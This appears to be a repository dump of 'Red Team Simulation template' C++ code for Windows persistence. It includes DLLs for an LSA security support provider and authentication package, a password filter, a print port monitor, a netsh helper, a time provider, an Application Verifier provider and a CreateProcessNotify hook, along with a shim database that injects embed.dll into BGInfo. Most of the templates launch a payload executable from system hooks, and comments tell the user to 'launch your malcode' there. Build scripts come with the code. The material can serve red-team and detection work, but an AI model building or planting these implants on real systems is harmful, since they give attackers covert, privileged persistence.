├── Administrator
    ├── Auth
    │   ├── compile.bat
    │   ├── sspapa.cpp
    │   └── sspapa.def
    ├── Cert
    │   ├── cert.cpp
    │   ├── cert.def
    │   └── compile.bat
    ├── backgroundinfo.sdb
    ├── networkhelp
    │   ├── compile.bat
    │   ├── networkhelp.cpp
    │   └── networkhelp.def
    ├── passwordfilter
    │   ├── compile.bat
    │   ├── passwordfilter.cpp
    │   └── passwordfilter.def
    ├── portmonitor
    │   ├── compile.bat
    │   ├── portmonitor.cpp
    │   └── portmonitor.def
    ├── tester
    │   ├── compile.bat
    │   ├── tester.cpp
    │   └── tester.dll
    └── timeprovision
    │   ├── compile.bat
    │   ├── timeprovision.cpp
    │   └── timeprovision.def
├── Client
    ├── Brandlnk.vbs
    ├── COM-comandeer
    │   ├── Folders-shell.cpp
    │   ├── Folders-shell.def
    │   └── compile.bat
    ├── DLL-comandeer
    │   ├── comp.bat
    │   └── windowsspool.cpp
    └── signon.bat
├── Embed
    ├── compile-dll.bat
    ├── compile-sr.bat
    ├── compile.bat
    ├── embed-dll.cpp
    ├── embed-sr.cpp
    ├── embed-sr.exe
    ├── embed.cpp
    ├── embed.dll
    ├── embed.exe
    ├── notepad64.bin
    └── rsa.py
└── README.md


/Administrator/Auth/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 sspapa.cpp sspapa.def /MT /link /DLL /OUT:sspapa.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/Auth/sspapa.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 | 
  3 |  Red Team Simulation template
  4 |  Authentication Package/Security Support Provider DLL template
  5 |  
  6 | Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
  7 | 
  8 | */
  9 | #include <ntstatus.h>
 10 | #define WIN32_NO_STATUS
 11 | #define SECURITY_WIN32
 12 | #include <windows.h>
 13 | #include <sspi.h>
 14 | #include <NTSecAPI.h>
 15 | #include <ntsecpkg.h>
 16 | #include <iostream>
 17 | #pragma comment(lib, "Secur32.lib")
 18 | 
 19 | int Go(void) {
 20 | 
 21 | 	STARTUPINFO info={sizeof(info)};
 22 |     PROCESS_INFORMATION processInfo;
 23 | 
 24 | 	CreateProcess(
 25 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
 26 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
 27 | 				&info, &processInfo);
 28 | 
 29 | 	return 0;
 30 | }
 31 | 
 32 | LSA_DISPATCH_TABLE DispatchTable;
 33 | 
 34 | NTSTATUS NTAPI SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable) { return 0; }
 35 | NTSTATUS NTAPI SpShutDown(void) { return 0; }
 36 | NTSTATUS NTAPI SpGetInfo(PSecPkgInfoW PackageInfo) {
 37 | 	PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
 38 | 	PackageInfo->wVersion = 1;
 39 | 	PackageInfo->wRPCID = SECPKG_ID_NONE;
 40 | 	PackageInfo->cbMaxToken = 0;
 41 | 	PackageInfo->Name = (SEC_WCHAR *)L"AuthPkgSSP";
 42 | 	PackageInfo->Comment = (SEC_WCHAR *)L"AuthPkgSSP";
 43 | 
 44 | 	return 0;
 45 | }
 46 | 
 47 | // LSA calls LsaApInitializePackage() when loading AuthPkg DLL
 48 | NTSTATUS LsaApInitializePackage(ULONG AuthenticationPackageId,
 49 | 								  PLSA_DISPATCH_TABLE LsaDispatchTable,
 50 | 								  PLSA_STRING Database,
 51 | 								  PLSA_STRING Confidentiality,
 52 | 								  PLSA_STRING *AuthenticationPackageName
 53 | 								  ) {
 54 | 	
 55 |     PLSA_STRING name = NULL;
 56 | 
 57 | 	HANDLE th;
 58 | 	
 59 | 	// launch your malcode in a separate thread
 60 | 	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
 61 | 	WaitForSingleObject(th, 0);
 62 | 
 63 |     DispatchTable.CreateLogonSession = LsaDispatchTable->CreateLogonSession;
 64 |     DispatchTable.DeleteLogonSession = LsaDispatchTable->DeleteLogonSession;
 65 |     DispatchTable.AddCredential = LsaDispatchTable->AddCredential;
 66 |     DispatchTable.GetCredentials = LsaDispatchTable->GetCredentials;
 67 |     DispatchTable.DeleteCredential = LsaDispatchTable->DeleteCredential;
 68 |     DispatchTable.AllocateLsaHeap = LsaDispatchTable->AllocateLsaHeap;
 69 |     DispatchTable.FreeLsaHeap = LsaDispatchTable->FreeLsaHeap;
 70 |     DispatchTable.AllocateClientBuffer = LsaDispatchTable->AllocateClientBuffer;
 71 |     DispatchTable.FreeClientBuffer = LsaDispatchTable->FreeClientBuffer;
 72 |     DispatchTable.CopyToClientBuffer = LsaDispatchTable->CopyToClientBuffer;
 73 |     DispatchTable.CopyFromClientBuffer = LsaDispatchTable->CopyFromClientBuffer;
 74 | 
 75 |     name = (LSA_STRING *)LsaDispatchTable->AllocateLsaHeap(sizeof *name);
 76 |     name->Buffer = (char *)LsaDispatchTable->AllocateLsaHeap(sizeof("SubAuth") + 1);
 77 | 
 78 |     name->Length = sizeof("SubAuth") - 1;
 79 |     name->MaximumLength = sizeof("SubAuth");
 80 |     strcpy_s(name->Buffer, sizeof("SubAuth") + 1, "SubAuth");
 81 | 
 82 |     (*AuthenticationPackageName) = name;
 83 | 
 84 | 	return 0;
 85 | }
 86 | 
 87 | NTSTATUS LsaApLogonUser(PLSA_CLIENT_REQUEST ClientRequest,
 88 |   SECURITY_LOGON_TYPE LogonType,
 89 |   PVOID AuthenticationInformation,
 90 |   PVOID ClientAuthenticationBase,
 91 |   ULONG AuthenticationInformationLength,
 92 |   PVOID *ProfileBuffer,
 93 |   PULONG ProfileBufferLength,
 94 |   PLUID LogonId,
 95 |   PNTSTATUS SubStatus,
 96 |   PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
 97 |   PVOID *TokenInformation,
 98 |   PLSA_UNICODE_STRING *AccountName,
 99 |   PLSA_UNICODE_STRING *AuthenticatingAuthority) {
100 | 	  return 0;
101 |   }
102 | 
103 | NTSTATUS LsaApCallPackage(PLSA_CLIENT_REQUEST ClientRequest,
104 |   PVOID ProtocolSubmitBuffer,
105 |   PVOID ClientBufferBase,
106 |   ULONG SubmitBufferLength,
107 |   PVOID *ProtocolReturnBuffer,
108 |   PULONG ReturnBufferLength,
109 |   PNTSTATUS ProtocolStatus
110 |   ) {
111 | 	  return 0;
112 |   }
113 | 
114 | void LsaApLogonTerminated(PLUID LogonId) {  }
115 | 
116 | NTSTATUS LsaApCallPackageUntrusted(
117 |    PLSA_CLIENT_REQUEST ClientRequest,
118 |    PVOID               ProtocolSubmitBuffer,
119 |    PVOID               ClientBufferBase,
120 |    ULONG               SubmitBufferLength,
121 |    PVOID               *ProtocolReturnBuffer,
122 |    PULONG              ReturnBufferLength,
123 |    PNTSTATUS           ProtocolStatus
124 |   ) {
125 | 	  return 0;
126 |   }
127 | 
128 | NTSTATUS LsaApCallPackagePassthrough(
129 |   PLSA_CLIENT_REQUEST ClientRequest,
130 |   PVOID ProtocolSubmitBuffer,
131 |   PVOID ClientBufferBase,
132 |   ULONG SubmitBufferLength,
133 |   PVOID *ProtocolReturnBuffer,
134 |   PULONG ReturnBufferLength,
135 |   PNTSTATUS ProtocolStatus
136 |   ) {
137 | 	  return 0;
138 |   }
139 | 
140 | NTSTATUS LsaApLogonUserEx(
141 |   PLSA_CLIENT_REQUEST ClientRequest,
142 |   SECURITY_LOGON_TYPE LogonType,
143 |   PVOID AuthenticationInformation,
144 |   PVOID ClientAuthenticationBase,
145 |   ULONG AuthenticationInformationLength,
146 |   PVOID *ProfileBuffer,
147 |   PULONG ProfileBufferLength,
148 |   PLUID LogonId,
149 |   PNTSTATUS SubStatus,
150 |   PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
151 |   PVOID *TokenInformation,
152 |   PUNICODE_STRING *AccountName,
153 |   PUNICODE_STRING *AuthenticatingAuthority,
154 |   PUNICODE_STRING *MachineName
155 |   ) {
156 | 	  return 0;
157 |   }
158 | 
159 | NTSTATUS LsaApLogonUserEx2(
160 |   PLSA_CLIENT_REQUEST ClientRequest,
161 |   SECURITY_LOGON_TYPE LogonType,
162 |   PVOID ProtocolSubmitBuffer,
163 |   PVOID ClientBufferBase,
164 |   ULONG SubmitBufferSize,
165 |   PVOID *ProfileBuffer,
166 |   PULONG ProfileBufferSize,
167 |   PLUID LogonId,
168 |   PNTSTATUS SubStatus,
169 |   PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
170 |   PVOID *TokenInformation,
171 |   PUNICODE_STRING *AccountName,
172 |   PUNICODE_STRING *AuthenticatingAuthority,
173 |   PUNICODE_STRING *MachineName,
174 |   PSECPKG_PRIMARY_CRED PrimaryCredentials,
175 |   PSECPKG_SUPPLEMENTAL_CRED_ARRAY *SupplementalCredentials
176 |   ) {
177 | 	  return 0;
178 |   }
179 | 
180 | SECPKG_FUNCTION_TABLE SecurityPackageFunctionTable[] = {
181 | 	{
182 | 		LsaApInitializePackage,
183 | 		LsaApLogonUser,
184 | 		LsaApCallPackage,
185 | 		LsaApLogonTerminated,
186 | 		LsaApCallPackageUntrusted,
187 | 		LsaApCallPackagePassthrough,
188 | 		LsaApLogonUserEx,
189 | 		LsaApLogonUserEx2,
190 | 		SpInitialize,
191 | 		SpShutDown,
192 | 		(SpGetInfoFn *) SpGetInfo, 
193 | 		NULL, NULL, NULL, NULL, NULL,
194 | 		NULL, NULL, NULL, NULL, NULL,
195 | 		NULL, NULL, NULL, NULL, NULL,
196 | 		NULL 
197 | 	}
198 | };
199 | 
200 | // LSA calls SpLsaModeInitialize() when loading SSP DLL
201 | NTSTATUS NTAPI SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion,
202 | 									PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables) {
203 | 	HANDLE th;
204 | 	
205 | 	// launch your malcode in a separate thread
206 | 	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
207 | 	WaitForSingleObject(th, 0);
208 | 	
209 | 	*PackageVersion = SECPKG_INTERFACE_VERSION;
210 | 	*ppTables = SecurityPackageFunctionTable;
211 | 	*pcTables = 1;
212 | 		
213 | 	return STATUS_SUCCESS;
214 | }
215 | 
216 | 
217 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
218 | 
219 | 	switch ( fdwReason ) {
220 | 		case DLL_PROCESS_ATTACH:
221 | 			break;
222 | 		case DLL_THREAD_ATTACH:
223 | 			break;
224 | 		case DLL_THREAD_DETACH:
225 | 			break;
226 | 		case DLL_PROCESS_DETACH:
227 | 			break;
228 | 		}
229 | 	return TRUE;
230 | }
231 | 


--------------------------------------------------------------------------------
/Administrator/Auth/sspapa.def:
--------------------------------------------------------------------------------
 1 | EXPORTS
 2 |   SpLsaModeInitialize
 3 |   SpInitialize
 4 |   LsaApInitializePackage
 5 |   LsaApCallPackage
 6 |   LsaApLogonTerminated
 7 |   LsaApCallPackageUntrusted
 8 |   LsaApCallPackagePassthrough
 9 |   LsaApLogonUserEx2
10 |   


--------------------------------------------------------------------------------
/Administrator/Cert/cert.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  Cert DLL template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 |  
 8 | 
 9 | */
10 | #include <windows.h>
11 | #include <stdio.h>
12 | 
13 | #define STATUS_SUCCESS 0x00000000
14 | typedef	enum	_REASON
15 | {
16 | 	PROCESS_CREATION_QUERY   = 1,
17 | 	PROCESS_CREATION_ALLOWED = 2,
18 | 	PROCESS_CREATION_DENIED  = 3
19 | } REASON;
20 | 
21 | extern "C" { __declspec(dllexport) NTSTATUS	NTAPI CreateProcessNotify(LPCWSTR, REASON); }
22 | 
23 | LPCWSTR	target = L"c:\\windows\\system32\\cmd.exe";
24 | 
25 | 
26 | void Go(LPCWSTR lpApplicationName) {
27 | 	// put your code here
28 | 	// example:
29 | 	wchar_t msgbuf[1024];
30 | 	
31 | 	swprintf(msgbuf, 1024, L"[%s] caught!\n", lpApplicationName);
32 | 	OutputDebugStringW(msgbuf);
33 | }
34 | 
35 | // CreateProcessNotify() is called whenever one of the below functions is called:
36 | // CreateProcess()
37 | // CreateProcessAsUser()
38 | // CreateProcessWithLogon()
39 | // CreateProcessWithToken()
40 | NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, REASON enReason) {
41 | 	NTSTATUS	ntStatus = STATUS_SUCCESS;
42 | 
43 | 	int r = -1;
44 | 	r = lstrcmpiW(target, lpApplicationName);
45 | 
46 | 	if ( !r ) {
47 | 		Go(lpApplicationName);
48 | 	}
49 | 
50 | 	return ntStatus;
51 | }
52 | 
53 | 
54 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
55 | 
56 | 	switch ( fdwReason ) {
57 | 		case DLL_PROCESS_ATTACH:
58 | 						break;
59 | 		case DLL_THREAD_ATTACH:
60 | 						break;
61 | 		case DLL_THREAD_DETACH:
62 | 						break;
63 | 		case DLL_PROCESS_DETACH:
64 | 						break;
65 | 		}
66 | 	return TRUE;
67 | }
68 | 
69 | 
70 | 


--------------------------------------------------------------------------------
/Administrator/Cert/cert.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |   CreateProcessNotify


--------------------------------------------------------------------------------
/Administrator/Cert/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL cert.cpp cert.def /MT /link /DLL /OUT:cert.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/backgroundinfo.sdb:
--------------------------------------------------------------------------------
1 |       sdbfxê  x    8p8`@   ˜   E.OFNIGB@  x   8p8`˜    x   8p82@˜    x   8p8 `˜    x   8p8`˜    x   8p8`˜    x   86p8`@   ˜    x   86p8`˜    x   8
2 | p8@˜    x   8Ap8
3 | @   ˜    x   85p8`@   ˜    x   85p8`˜    x   8.p8`@   ˜    x   8p8`@   ˜    x   8p8˜    x   8p8@   ˜    x   8p8˜   ÂŸ_ºû’<m@  x   8p8`@   ˜    x   8p8`@   ˜    x   8p8`@   ˜    x   8p8`@   ˜    x   8%p8`˜    x   8-p8`˜    x   8/p8`@   ˜    x   8/p8`@   ˜    x   8:p8`@   ˜    x   8:p8`˜    x   84p8`@   ˜    x   84p8`@   ˜    x   8?p8`@   ˜    x   8?p8`˜    pÌ   P @€['DÑ"`   `   #@   !@%      Ø6=mF˜ê3MÞªj˜p    pˆ   `0   `   `L      Aa.úÍÚOƒþq@6æ"   u©É2DsKˆ¯mZ¡®Ò<p2   `f   	`p   `   `¤   P      P      `¤   	p   `´   `Î   x  ˆ   3 . 0 . 0 . 9   ˆ   B G i n f o   ˆ   B G I N F O . E X E   ˆ   M i c r o s o f t   ˆ   *   ˆ   S y s i n t e r n a l s   ˆ   B G I n f o   ˆ
4 |    4 . 2 0   ˆ   I n j e c t D l l   ˆ@   C : \ Windows Persistent \ Embed \ embed . d l l   
5 | 
6 | 
7 | 


--------------------------------------------------------------------------------
/Administrator/networkhelp/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL networkhelp.cpp /MT /link /DLL /OUT:networkhelp.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/networkhelp/networkhelp.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  Networksh Helper DLL template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #include <windows.h>
10 | #include <stdio.h>
11 | 
12 | void Go(void) {
13 |     STARTUPINFO info={sizeof(info)};
14 |     PROCESS_INFORMATION processInfo;
15 | 
16 | 	CreateProcess(
17 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
18 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
19 | 				&info, &processInfo);
20 | 	
21 | }
22 | 
23 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
24 | {
25 | 	HANDLE threadHandle;
26 | 
27 | 	threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Go, NULL, 0, NULL);
28 | 	CloseHandle(threadHandle);
29 | 
30 | 	return 0;
31 | }
32 | 
33 | 
34 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
35 | 
36 | 	switch ( fdwReason ) {
37 | 		case DLL_PROCESS_ATTACH:
38 | 						break;
39 | 		case DLL_THREAD_ATTACH:
40 | 						break;
41 | 		case DLL_THREAD_DETACH:
42 | 						break;
43 | 		case DLL_PROCESS_DETACH:
44 | 						break;
45 | 		}
46 | 	return TRUE;
47 | }
48 | 


--------------------------------------------------------------------------------
/Administrator/networkhelp/networkhelp.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |   CreateProcessNotify


--------------------------------------------------------------------------------
/Administrator/passwordfilter/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL passwordfilter.cpp passwordfilter.def /MT /link /DLL /OUT:passwordfilter.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/passwordfilter/passwordfilter.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  LSA Password Filter DLL template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #include <windows.h>
10 | #include <stdio.h>
11 | #include <WinInet.h>
12 | #include <ntsecapi.h>
13 | 
14 | int Go(void) {
15 | 
16 | 	STARTUPINFO info={sizeof(info)};
17 |     PROCESS_INFORMATION processInfo;
18 | 
19 | 	CreateProcess(
20 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
21 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
22 | 				&info, &processInfo);
23 | 
24 | 	return 0;
25 | }
26 | 
27 | BOOLEAN __stdcall InitializeChangeNotify(void) { 
28 | 
29 | 	HANDLE th;
30 | 	
31 | 	// launch your malcode in a separate thread
32 | 	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
33 | 	WaitForSingleObject(th, 0);
34 | 
35 | 	return TRUE;
36 | }
37 | NTSTATUS __stdcall PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword) { return 0; }
38 | BOOLEAN __stdcall PasswordFilter(PUNICODE_STRING AccountName, PUNICODE_STRING FullName, PUNICODE_STRING Password, BOOLEAN SetOperation) { return TRUE; }
39 | 
40 | 


--------------------------------------------------------------------------------
/Administrator/passwordfilter/passwordfilter.def:
--------------------------------------------------------------------------------
1 | LIBRARY
2 | EXPORTS
3 |   InitializeChangeNotify
4 |   PasswordFilter
5 |   PasswordChangeNotify
6 |   


--------------------------------------------------------------------------------
/Administrator/portmonitor/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 portmonitor.cpp portmonitor.def /MT /link /DLL /OUT:portmonitor.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/portmonitor/portmonitor.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  Port Monitor DLL template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | 
 8 | */
 9 | #include <Windows.h>
10 | #include <Winsplp.h>
11 | 
12 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
13 | 
14 | 	switch ( fdwReason ) {
15 | 		case DLL_PROCESS_ATTACH:
16 | 			break;
17 | 		case DLL_THREAD_ATTACH:
18 | 			break;
19 | 		case DLL_THREAD_DETACH:
20 | 			break;
21 | 		case DLL_PROCESS_DETACH:
22 | 			break;
23 | 		}
24 | 	return TRUE;
25 | }
26 | 
27 | void Go(void) {
28 |     STARTUPINFO info={sizeof(info)};
29 |     PROCESS_INFORMATION processInfo;
30 | 
31 | 	CreateProcess(
32 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
33 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
34 | 				&info, &processInfo);
35 | 
36 | }
37 | 
38 | // Mandatory functions
39 | BOOL WINAPI pfnOpenPort(HANDLE hMonitor, LPWSTR pName, PHANDLE pHandle){ return TRUE; }
40 | BOOL WINAPI OpenPortEx(HANDLE hMonitor, HANDLE hMonitorPort, LPWSTR pPortName, LPWSTR pPrinterName, PHANDLE pHandle, struct _MONITOR2 *pMonitor){ return TRUE; }
41 | BOOL (WINAPI pfnStartDocPort)(HANDLE hPort, LPWSTR pPrinterName, DWORD JobId, DWORD Level, LPBYTE pDocInfo) { return TRUE; }
42 | BOOL WritePort(HANDLE hPort, LPBYTE pBuffer, DWORD cbBuf, LPDWORD pcbWritten){ return TRUE; }
43 | BOOL ReadPort(HANDLE hPort, LPBYTE pBuffer, DWORD cbBuffer, LPDWORD pcbRead){ return TRUE; }
44 | BOOL (WINAPI pfnEndDocPort)(HANDLE hPort) { return TRUE; }
45 | BOOL ClosePort(HANDLE hPort){ return TRUE; }
46 | BOOL XcvOpenPort(HANDLE hMonitor, LPCWSTR pszObject, ACCESS_MASK GrantedAccess, PHANDLE phXcv) { return TRUE; }
47 | DWORD XcvDataPort(HANDLE hXcv, LPCWSTR pszDataName, PBYTE  pInputData, DWORD cbInputData, PBYTE  pOutputData, DWORD cbOutputData, PDWORD pcbOutputNeeded) { return ERROR_SUCCESS; }
48 | BOOL XcvClosePort(HANDLE hXcv){ return TRUE; }
49 | VOID (WINAPI pfnShutdown)(HANDLE hMonitor) { }
50 | DWORD WINAPI pfnNotifyUsedPorts(HANDLE hMonitor,DWORD cPorts,PCWSTR *ppszPorts){ return ERROR_SUCCESS; }
51 | DWORD WINAPI pfnNotifyUnusedPorts(HANDLE hMonitor,DWORD cPorts,PCWSTR *ppszPorts){ return ERROR_SUCCESS; }
52 | DWORD WINAPI pfnPowerEvent(HANDLE hMonitor,DWORD event,POWERBROADCAST_SETTING *pSettings){ return ERROR_SUCCESS; }
53 | 
54 | 
55 | LPMONITOR2 WINAPI InitializePrintMonitor2(PMONITORINIT pMonitorInit, PHANDLE phMonitor){
56 | 	// launch your malcode in a separate thread
57 | 	CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
58 | 	
59 | 	MONITOR2 mon = {sizeof(MONITOR2), NULL, pfnOpenPort, OpenPortEx, pfnStartDocPort, WritePort, ReadPort, pfnEndDocPort, ClosePort, NULL, NULL, NULL, NULL, NULL, NULL, XcvOpenPort, XcvDataPort, XcvClosePort, pfnShutdown, NULL, pfnNotifyUsedPorts, pfnNotifyUnusedPorts, pfnPowerEvent };
60 | 	return &mon;
61 | }
62 | 


--------------------------------------------------------------------------------
/Administrator/portmonitor/portmonitor.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |   InitializePrintMonitor2


--------------------------------------------------------------------------------
/Administrator/tester/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL tester.cpp /MT /link /DLL /OUT:tester.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/tester/tester.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  DLL proxy template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 | */
 8 | #include <Windows.h>
 9 | 
10 | // https://docs.microsoft.com/en-us/archive/blogs/reiley/a-debugging-approach-to-application-verifier
11 | #define DLL_PROCESS_VERIFIER 4
12 | 
13 | typedef VOID (NTAPI * RTL_VERIFIER_DLL_LOAD_CALLBACK) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
14 | typedef VOID (NTAPI * RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (PWSTR DllName, PVOID DllBase, SIZE_T DllSize, PVOID Reserved);
15 | typedef VOID (NTAPI * RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (PVOID AllocationBase, SIZE_T AllocationSize);
16 | 
17 | typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
18 |   PCHAR ThunkName;
19 |   PVOID ThunkOldAddress;
20 |   PVOID ThunkNewAddress;
21 | } RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;
22 | 
23 | typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
24 |   PWCHAR DllName;
25 |   DWORD DllFlags;
26 |   PVOID DllAddress;
27 |   PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
28 | } RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;
29 | 
30 | typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
31 |   DWORD Length;
32 |   PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
33 |   RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
34 |   RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;
35 |   PWSTR VerifierImage;
36 |   DWORD VerifierFlags;
37 |   DWORD VerifierDebug;
38 |   PVOID RtlpGetStackTraceAddress;
39 |   PVOID RtlpDebugPageHeapCreate;
40 |   PVOID RtlpDebugPageHeapDestroy;
41 |   RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
42 | } RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR;
43 | 
44 | static RTL_VERIFIER_DLL_DESCRIPTOR atDLLs[] = { { 0 } };
45 | static RTL_VERIFIER_PROVIDER_DESCRIPTOR tVpd = { sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR), atDLLs };
46 | 
47 | void Go(void) {
48 |     STARTUPINFO info={sizeof(info)};
49 |     PROCESS_INFORMATION processInfo;
50 | 
51 | 	CreateProcess(
52 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
53 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
54 | 				&info, &processInfo);
55 | 
56 | }
57 | 
58 | BOOL ProcessVerifier(IN PVOID lpReserved)
59 | {
60 | 	*((PRTL_VERIFIER_PROVIDER_DESCRIPTOR *)lpReserved) = &tVpd;
61 | 
62 | 	// launch your malcode in a separate thread
63 | 	CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
64 | 
65 | 	return TRUE;
66 | }
67 | 
68 | 
69 | BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
70 | 
71 |     switch (ul_reason_for_call)  {
72 | 	case DLL_PROCESS_VERIFIER:
73 | 		return ProcessVerifier(lpReserved);
74 |     case DLL_PROCESS_ATTACH:
75 | 		break;
76 |     case DLL_THREAD_ATTACH:
77 | 		break;
78 |     case DLL_THREAD_DETACH:
79 | 		break;
80 |     case DLL_PROCESS_DETACH:
81 |         break;
82 |     }
83 |     return TRUE;
84 | }
85 | 
86 | 
87 | 


--------------------------------------------------------------------------------
/Administrator/tester/tester.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jaamaal/Embed/e65478043dcdfe09a1a85eecacae56cabfd5b878/Administrator/tester/tester.dll


--------------------------------------------------------------------------------
/Administrator/timeprovision/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 | 
3 | cl.exe /W0 /D_USRDLL /D_WINDLL timeprovision.cpp timeprovision.def /MT /link /DLL /OUT:timeprovision.dll
4 | 


--------------------------------------------------------------------------------
/Administrator/timeprovision/timeprovision.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 | 
 3 |  Red Team Simulation template
 4 |  Time Provider DLL template
 5 |  
 6 |  Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
 7 |  based on: https://docs.microsoft.com/en-us/windows/win32/sysinfo/sample-time-provider
 8 | 
 9 | */
10 | 
11 | #include <windows.h>
12 | #include "timeprov.h"
13 | 
14 | TimeProvSysCallbacks sc;
15 | //WCHAR ProviderName1[] = L"MyCompanyMyAppProvider1";
16 | const TimeProvHandle htp = (TimeProvHandle)1;
17 | TpcGetSamplesArgs Samples;
18 | DWORD dwPollInterval;
19 | 
20 | void Go(void) {
21 |     STARTUPINFO info={sizeof(info)};
22 |     PROCESS_INFORMATION processInfo;
23 | 
24 | 	CreateProcess(
25 | 				"c:\\Windows Persistent\\Embed\\embed.exe", 
26 | 				"", NULL, NULL, TRUE, 0, NULL, NULL, 
27 | 				&info, &processInfo);
28 | 
29 | }
30 | 
31 | HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) {
32 | 
33 | 	// launch your malcode in a separate thread
34 | 	CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Go, 0, 0, 0);
35 | 
36 | 	// Copy the system callback pointers to a buffer.
37 | 	CopyMemory(&sc, (PVOID)pSysCallback, sizeof(TimeProvSysCallbacks));
38 | 	*phTimeProv = htp;
39 | 
40 |    return S_OK;
41 | }
